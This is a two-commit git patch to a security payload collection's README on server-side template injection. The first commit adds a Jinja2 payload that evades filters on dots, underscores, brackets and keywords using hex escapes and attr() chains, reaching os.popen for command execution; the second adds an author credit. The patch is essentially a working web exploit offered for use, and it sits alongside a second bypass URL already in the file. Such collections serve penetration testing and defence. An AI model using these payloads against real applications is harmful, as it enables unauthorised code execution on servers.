From cc3b05017dff2055ee3fe187a27437390b1b100a Mon Sep 17 00:00:00 2001
From: chiv <gus@outlook.at>
Date: Mon, 13 Apr 2020 18:44:16 +0100
Subject: [PATCH 1/2] Added a new RCE payload to Jinja2 SSTI bypasses

---
 Server Side Template Injection/README.md | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 79c2a9f7..45447693 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -368,6 +368,11 @@ Bypassing `|join`
 http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
 ```
 
+Bypassing most common filters ('.','_','|join','[',']','mro' and 'base'):
+```python
+{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
+```
+
 ## Jinjava
 
 ### Basic injection

From 7e7f5e762831266b22531c258d628172c7038bb9 Mon Sep 17 00:00:00 2001
From: chiv <gus@outlook.at>
Date: Mon, 13 Apr 2020 18:48:43 +0100
Subject: [PATCH 2/2] Added SSTI RCE bypass payload for Jinja2

---
 Server Side Template Injection/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 45447693..2c35f22c 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -368,7 +368,7 @@ Bypassing `|join`
 http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
 ```
 
-Bypassing most common filters ('.','_','|join','[',']','mro' and 'base'):
+Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus:
 ```python
 {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
 ```